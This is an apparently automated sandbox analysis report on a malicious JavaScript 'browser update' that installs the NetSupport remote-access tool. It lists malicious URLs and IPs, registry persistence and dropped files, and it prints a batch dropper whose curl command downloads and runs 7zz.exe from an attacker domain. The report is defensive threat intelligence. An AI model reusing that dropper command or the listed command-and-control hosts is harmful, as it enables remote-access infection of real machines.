http://%s/testpage.htm	7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr	false	Avira URL Cloud: safe	low
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
http://127.0.0.1	7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	false	Avira URL Cloud: safe	unknown
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat-o	curl.exe, 00000008.00000002.566444166.000001E004520000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	false		high
https://mangoairsoft.com/	wscript.exe, 00000000.00000003.587018717.0000021D8FD03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588803421.0000021D8FD05000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
http://%s/fakeurl.htm	7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr	false	Avira URL Cloud: safe	low
http://geo.netsupportsoftware.com/location/loca.aspht	client32.exe, 00000012.00000003.591847369.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596596763.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592834653.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.599027545.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.593770160.00000000059B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592400717.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595066226.00000000059BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597068792.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.590890417.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597354785.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595846294.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597234235.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596926524.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596211876.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592266720.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-	curl.exe, 00000006.00000002.564520921.000002519C800000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z-	curl.exe, 00000004.00000002.561363860.0000024355B80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
https://magydostravel.com/cdn/zwmrqqgqnaww.php	CacheURL.dat.15.dr	true	Avira URL Cloud: malware	unknown
http://www.symauth.com/rpa00	7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
https://magydostravel.com/8	wscript.exe, 00000000.00000003.554101851.0000021D8DA24000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://geo.netsupportsoftware.com/location/loca.aspmB	client32.exe, 00000012.00000003.591847369.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596596763.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592834653.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.599027545.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.593770160.00000000059B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592400717.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595066226.00000000059BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597068792.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.590890417.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597354785.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595846294.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597234235.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596926524.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596211876.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592266720.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf250	wscript.exe, 00000000.00000002.588198047.0000021D8F6F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588155785.0000021D8DBF5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z~	curl.exe, 00000004.00000003.560917841.0000024355B9F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.561421492.0000024355BBB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.560939503.0000024355BA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspTrap	client32.exe, 00000012.00000003.600308055.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600433827.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600887260.00000000059F1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.netsupportschool.com/tutor-assistant.asp11(L	7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	false		high
http://crl.v	wscript.exe, 00000000.00000002.588248467.0000021D8FAC0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asp:j	client32.exe, 00000012.00000003.596596763.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592834653.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597255352.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075040257.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.599027545.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.593770160.00000000059B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595066226.00000000059BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597068792.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600308055.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595961065.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600433827.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597354785.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595846294.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597234235.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596926524.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596211876.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.601282825.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600887260.00000000059F1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.netsupportschool.com/tutor-assistant.asp	7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.127.230.147	mangoairsoft.com	Russian Federation	56694	DHUBRU	true
185.9.147.166	magydostravel.com	Russian Federation	56694	DHUBRU	true
94.158.247.23	unknown	Moldova Republic of	39798	MIVOCLOUDMD	true
62.172.138.67	geography.netsupportsoftware.com	United Kingdom	5400	BTGB	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1284202
Start date and time:	2023-08-02 10:34:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Browser_update16.0.5836.js
Detection:	MAL
Classification:	mal92.troj.evad.winJS@40/37@6/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 12.5% (good quality ratio 12.4%) Quality average: 79.8% Quality standard deviation: 21.6%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .js Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:35:11	API Interceptor	2x Sleep call for process: wscript.exe modified
10:35:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CachedX C:\ProgramData\client32.exe
10:35:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CachedX C:\ProgramData\client32.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.127.230.147	Chrome_update(1).js	Get hash	malicious	Unknown	Browse
	Chrome_update.js	Get hash	malicious	Unknown	Browse
	sett.bat	Get hash	malicious	Unknown	Browse
	Chrome_update.js	Get hash	malicious	Unknown	Browse
185.9.147.166	http://itsdigitalshiva.com	Get hash	malicious	Unknown	Browse
94.158.247.23	Chrome_update(1).js	Get hash	malicious	Unknown	Browse	http://94.158.247.23/fakeurl.htm
	Chrome_update.js	Get hash	malicious	Unknown	Browse	http://94.158.247.23/fakeurl.htm
	Chrome_update.js	Get hash	malicious	Unknown	Browse	http://94.158.247.23/fakeurl.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geography.netsupportsoftware.com	Chrome_update(1).js	Get hash	malicious	Unknown	Browse	62.172.138.8
	Chrome_update.js	Get hash	malicious	Unknown	Browse	62.172.138.8
	Chrome_update.js	Get hash	malicious	Unknown	Browse	62.172.138.67
	8xW3tocJ6B.exe	Get hash	malicious	Unknown	Browse	62.172.138.67
	5r5RuD1r4x.exe	Get hash	malicious	Unknown	Browse	51.142.119.24
	jqCED7njWa.exe	Get hash	malicious	Unknown	Browse	62.172.138.8
	EN-localer.hta	Get hash	malicious	Cobalt Strike, NetSupport RAT	Browse	51.142.119.24
	RNdbR3uRmZ.exe	Get hash	malicious	Unknown	Browse	62.172.138.67
	local-EN.hta	Get hash	malicious	Cobalt Strike, NetSupport RAT	Browse	62.172.138.67
	shdeulerinstall.lnk	Get hash	malicious	NetSupport RAT	Browse	62.172.138.67
	BP6R1D2cOd.exe	Get hash	malicious	Unknown	Browse	62.172.138.8
	bRGk8rpf6M.exe	Get hash	malicious	Unknown	Browse	62.172.138.67
	tqWIHaQ2EZ.exe	Get hash	malicious	Unknown	Browse	62.172.138.67
	mitljPgJ0K.exe	Get hash	malicious	Unknown	Browse	51.142.119.24
	sq36TjF9Sk.exe	Get hash	malicious	Nymaim	Browse	62.172.138.67
	yOUWkF8AHi.exe	Get hash	malicious	Unknown	Browse	62.172.138.67
	Ae8DId1ZVs.exe	Get hash	malicious	Unknown	Browse	62.172.138.8
	tUUPQygorhzFkIcHuB.bat	Get hash	malicious	Unknown	Browse	62.172.138.67
	h60FUiSRcC.js	Get hash	malicious	Unknown	Browse	62.172.138.67

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DHUBRU	Chrome_update(1).js	Get hash	malicious	Unknown	Browse	188.127.230.147
	Chrome_update.js	Get hash	malicious	Unknown	Browse	188.127.230.147
	sett.bat	Get hash	malicious	Unknown	Browse	188.127.230.147
	Chrome_update.js	Get hash	malicious	Unknown	Browse	188.127.230.147
	Chrome_update.js	Get hash	malicious	Unknown	Browse	152.89.218.150
	Chrome_update.js	Get hash	malicious	Unknown	Browse	152.89.218.150
	http://itsdigitalshiva.com	Get hash	malicious	Unknown	Browse	185.9.147.166
	https://altiordp.com/cdn-js/wds.min.php	Get hash	malicious	Unknown	Browse	188.127.225.232
	tUUPQygorhzFkIcHuB.bat	Get hash	malicious	Unknown	Browse	188.127.225.160
	VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.bat	Get hash	malicious	Unknown	Browse	188.127.225.160
	2_1.bat	Get hash	malicious	Unknown	Browse	188.127.225.160
	2.bat	Get hash	malicious	Unknown	Browse	188.127.225.231
	KjMLNNlbSwRjEriciGnpqBNGGsSj.bat	Get hash	malicious	Unknown	Browse	188.127.225.231
	sett.bat	Get hash	malicious	Unknown	Browse	188.127.225.231
	h60FUiSRcC.js	Get hash	malicious	Unknown	Browse	188.127.225.160
	2.bat	Get hash	malicious	Unknown	Browse	188.127.225.160
	sett.bat	Get hash	malicious	Unknown	Browse	188.127.225.160
	h60FUiSRcC.js	Get hash	malicious	Unknown	Browse	188.127.225.160
	2023-07-12-Gozi.dll	Get hash	malicious	Ursnif, Strela Stealer	Browse	91.199.147.95

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ce5f3254611a8c095a3d821d44539877	Apt3bghahedghc1_browsingDocx.docx	Get hash	malicious	Unknown	Browse	185.9.147.166
	Apt3bghahedghc2_browsingDocx.docx	Get hash	malicious	Unknown	Browse	185.9.147.166
	Newcopperstealer10_browsingExe.exe	Get hash	malicious	Unknown	Browse	185.9.147.166
	Newcopperstealer10_browsingExe.exe	Get hash	malicious	Unknown	Browse	185.9.147.166
	file.exe	Get hash	malicious	RisePro Stealer	Browse	185.9.147.166
	NfE_3200vfrtytooi534eerQs0183nbnmbbmb28.msi	Get hash	malicious	Unknown	Browse	185.9.147.166
	l97Fm9s3CC.exe	Get hash	malicious	Amadey	Browse	185.9.147.166
	Return_To_Work.docx	Get hash	malicious	Unknown	Browse	185.9.147.166
	qdIJ1BInME.exe	Get hash	malicious	RisePro Stealer	Browse	185.9.147.166
	file.exe	Get hash	malicious	RisePro Stealer	Browse	185.9.147.166
	ouq3ougHvh.exe	Get hash	malicious	Nymaim	Browse	185.9.147.166
	RNbown7VnS.exe	Get hash	malicious	SmokeLoader	Browse	185.9.147.166
	file.exe	Get hash	malicious	RisePro Stealer	Browse	185.9.147.166
	file.exe	Get hash	malicious	RisePro Stealer	Browse	185.9.147.166
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	185.9.147.166
	resume.doc.bin.exe	Get hash	malicious	Unknown	Browse	185.9.147.166
	resume.doc.bin.exe	Get hash	malicious	Unknown	Browse	185.9.147.166
	DoubleHop.bin.exe	Get hash	malicious	Unknown	Browse	185.9.147.166
	DoubleHop.bin.exe	Get hash	malicious	Unknown	Browse	185.9.147.166

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\7zz.exe	Chrome_update(1).js	Get hash	malicious	Unknown	Browse
	Chrome_update.js	Get hash	malicious	Unknown	Browse
	Chrome_update.js	Get hash	malicious	Unknown	Browse
	tUUPQygorhzFkIcHuB.bat	Get hash	malicious	Unknown	Browse
	VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.bat	Get hash	malicious	Unknown	Browse
	h60FUiSRcC.js	Get hash	malicious	Unknown	Browse
	h60FUiSRcC.js	Get hash	malicious	Unknown	Browse
	niqS1law5h.js	Get hash	malicious	Unknown	Browse
	niqS1law5h.js	Get hash	malicious	Unknown	Browse
	iGlTkXaLWeKxfXgiFdNuxOaOgbdWVaOw.bat	Get hash	malicious	Unknown	Browse
	Browser_update.js	Get hash	malicious	Unknown	Browse
	Browser_portable_version.js	Get hash	malicious	Unknown	Browse
	Browser_update.js	Get hash	malicious	Unknown	Browse
	8bx1ECBJPP.js	Get hash	malicious	Unknown	Browse
	8bx1ECBJPP.js	Get hash	malicious	Unknown	Browse
	i7gVJvg3pD.js	Get hash	malicious	Unknown	Browse
	InstallationAssistant.exe	Get hash	malicious	Unknown	Browse
	11.bat	Get hash	malicious	Unknown	Browse
	Chrome_update.js	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\7z.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	5.2815529506714745
Encrypted:	false
SSDEEP:	6:CxBR2wkn23f7fFlCe8UlLAHbKx4/mWB1wkn23fmvn:cnRfDfFADC0vePf+v
MD5:	94097D883ED6A6691EE14C2F1B09DB56
SHA1:	3A1CB32D203983D8FA8C990D8F6F46F626B1F7DD
SHA-256:	0431046050278512BB3451C6E52B2A4E65399F6C926618AEFB576E085A8BDB14
SHA-512:	3C19AC495640BAB0E10025DE5B24D6B1AC6DD49340EF2C7611E66D71EC854E4C8E1FE4B8DD56F91D69C27C387786383B8AAC7D7A37C26C2FF0C42A3C5ACD2621
Malicious:	false
Preview:	if not exist "C:\Users\user\AppData\Local\Temp/7zz.exe" ( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" ) .."C:\Users\user\AppData\Local\Temp/7zz.exe"..

C:\ProgramData\7zz.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	587776
Entropy (8bit):	6.439962628647099
Encrypted:	false
SSDEEP:	12288:myyKdVnyNhXCV4EkP7AIfzNXZ0b5NrnkcAqIV0A1caRI:mKvyNhXCV4E8BXAfrnkcAqU0A
MD5:	42BADC1D2F03A8B1E4875740D3D49336
SHA1:	CEE178DA1FB05F99AF7A3547093122893BD1EB46
SHA-256:	C136B1467D669A725478A6110EBAAAB3CB88A3D389DFA688E06173C066B76FCF
SHA-512:	6BC519A7368EE6BD8C8F69F2D634DD18799B4CA31FBC284D2580BA625F3A88B6A52D2BC17BEA0E75E63CA11C10356C47EE00C2C500294ABCB5141424FC5DC71C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Chrome_update(1).js, Detection: malicious, Browse Filename: Chrome_update.js, Detection: malicious, Browse Filename: Chrome_update.js, Detection: malicious, Browse Filename: tUUPQygorhzFkIcHuB.bat, Detection: malicious, Browse Filename: VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.bat, Detection: malicious, Browse Filename: h60FUiSRcC.js, Detection: malicious, Browse Filename: h60FUiSRcC.js, Detection: malicious, Browse Filename: niqS1law5h.js, Detection: malicious, Browse Filename: niqS1law5h.js, Detection: malicious, Browse Filename: iGlTkXaLWeKxfXgiFdNuxOaOgbdWVaOw.bat, Detection: malicious, Browse Filename: Browser_update.js, Detection: malicious, Browse Filename: Browser_portable_version.js, Detection: malicious, Browse Filename: Browser_update.js, Detection: malicious, Browse Filename: 8bx1ECBJPP.js, Detection: malicious, Browse Filename: 8bx1ECBJPP.js, Detection: malicious, Browse Filename: i7gVJvg3pD.js, Detection: malicious, Browse Filename: InstallationAssistant.exe, Detection: malicious, Browse Filename: 11.bat, Detection: malicious, Browse Filename: Chrome_update.js, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.rR9p..9p..9p..Bl..;p...l.. p...V..[p...xC.8p..9p...p...xA.>p...V...p..V....p..V...;p...v..8p..Rich9p..................PE..L....S.L............................L.............@.........................................................................\...P.......(...............................................................................P............................text............................... ..`.rdata..............................@..@.data............l..................@....sxdata.............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CacheURL.dat

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.448934896284057
Encrypted:	false
SSDEEP:	3:N8YW2TdBLESqNXLEXNCv:2YLTdB6NgXS
MD5:	39F6D8FA3BD905E03B0CC8CC16707E2B
SHA1:	872DCC92BFF8F52A8F6BD1905F959C991C607472
SHA-256:	54B920F5B87019FCF313BEC4D9F4639A932B8268E5183B29804E91E29ED6F726
SHA-512:	B9C726C0164AAB96D53795202C95591285FAAE8D882E0F0B6601189011C085349969ADF484947F0CBC64966A4A6593F483B8A32E9778E741D24519CF17D04B1E
Malicious:	false
Preview:	https://magydostravel.com/cdn/zwmrqqgqnaww.php..

C:\ProgramData\HTCTL32.DLL

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.7547459359511395
Encrypted:	false
SSDEEP:	6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
MD5:	C94005D2DCD2A54E40510344E0BB9435
SHA1:	55B4A1620C5D0113811242C20BD9870A1E31D542
SHA-256:	3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
SHA-512:	2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\HTCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HTML_Obj_list.txt

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	298
Entropy (8bit):	4.25628025837569
Encrypted:	false
SSDEEP:	6:0MUIbLESrO4ywjsKVw1ASywzJHI3Sc8klIoAhHFN1zNseIR3VwWzt3YYn:0M+74+KAAObelqrU1YYn
MD5:	3FA98AC589AC2B284F4D625A620D66BC
SHA1:	6E473A2A0C95367A61AB98AAD4472577246E42F0
SHA-256:	D9AE5DC5F2C4964C1E7BA3BE64CBA37F3043484DB9056D3A828102275D7D4101
SHA-512:	FA4BB059BFB9305CBB0DA36B8AE51ACD3EBC151616FBD711494A3F60353C915BE947F24AF81145920F6F4AE234712B6F5223A630E3C1748B2D8E79A3D648BAD0
Malicious:	false
Preview:	<script;>;</script>.. onLoad;";".. onunload;";".. onchange;";".. onsubmit;";".. onreset;";".. onselect;";".. onblur;";".. onfocus;";".. onkeydown;";".. onkeypress;";".. onkeyup;";".. onclick;";".. ondblclick;";".. onmousedown;";".. onmousemove;";".. onmouseout;";".. onmouseover;";".. onmouseup;";"

C:\ProgramData\NSM.LIC

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	258
Entropy (8bit):	5.1458289587885675
Encrypted:	false
SSDEEP:	6:O/oPDvXk4xRPjwx3LzX81DKHMoEEjLgpW2MorGLUfKdYpPM/ioxTKa8l6i7s:X7XZR7wx3LzXBJjjqW2M23KKPM/iox7X
MD5:	1B41E64C60CA9DFADEB063CD822AB089
SHA1:	ABFCD51BB120A7EAE5BBD9A99624E4ABE0C9139D
SHA-256:	F4E2F28169E0C88B2551B6F1D63F8BA513FEB15BEACC43A82F626B93D673F56D
SHA-512:	C97E0EABEA62302A4CFEF974AC309F3498505DD055BA74133EE2462E215B3EBC5C647E11BCBAC1246B9F750B5D09240CA08A6B617A7007F2FA955F6B6DD7FEE4
Malicious:	false
Preview:	1200..0xa353ff01....; NetSupport License File...; Generated on 14:45 - 17/07/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=HANEYMANEY..maxslaves=8888..os2=1..product=10..serial_no=NSM385736..shrink_wrap=0..transport=0..

C:\ProgramData\NSM.ini

Download File

Process:	C:\ProgramData\7zz.exe
File Type:	Generic INItialization configuration [Features]
Category:	dropped
Size (bytes):	6458
Entropy (8bit):	4.645519507940197
Encrypted:	false
SSDEEP:	96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
